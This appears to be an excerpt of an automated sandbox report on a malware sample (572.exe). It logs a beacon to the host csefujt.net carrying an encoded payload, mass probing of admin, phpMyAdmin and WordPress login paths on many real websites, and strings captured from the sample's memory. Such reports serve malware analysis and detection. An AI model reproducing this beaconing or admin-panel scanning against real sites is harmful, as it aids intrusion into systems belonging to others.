                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: chainmine.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: v.xsanime.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: es-la.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ucivirtual.uci.edu.mx/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ag.ufa9999.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sigapbanjarmasin.infoAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://naukrigulf.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: casinocontroller.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kwyk.frAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=043e21066f59341f79d55d583419ce99User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pt.secure.imvu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://secure.vexcorp.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipCookie: PANPSC=; BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pan.baidu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: loopex.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: connect.appen.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: midetuvelocidad.claro.com.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: opsu.terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: followerstiktok.xyzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: foros.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: zuhauseplus.vodafone.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: idp.uitgeverij-deviant.nlAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: servicossociais.caixa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: hartico.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: virtuadopt.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: easygold.joyalukkas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: foros.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://foros.net/administrator/
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://multiideas.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://nossoplayer.me/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ventas.officeinsumos.com.arAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: innovationdevelopment.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hero-wars.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/Zarkana2" target="_blank" title="Facebook"><img src="images/facebook.png" width="32" height="32" /></a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/@Zarkana2?sub_confirmation=1" target="_blank" title="YouTube"><img src="images/youtube.png" width="32" height="32" /></a> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: &nbsp; | &nbsp;<a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.facebook.com%2FSteam" target="_blank" rel=" noopener"><img src="https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.png" alt="Facebook"> Steam</a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a id="help" href="//www.facebook.com/help/">Help Center</a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a id="back" href="//www.facebook.com/">Go Back</a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=596118847837331&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="//www.facebook.com/"> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <link rel="preconnect" href="https://www.facebook.com"> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <LI><A class="link_facebook" title="Facebook" href="https://www.facebook.com/caixa">Facebook</A> </LI> equals www.facebook.com (Facebook)
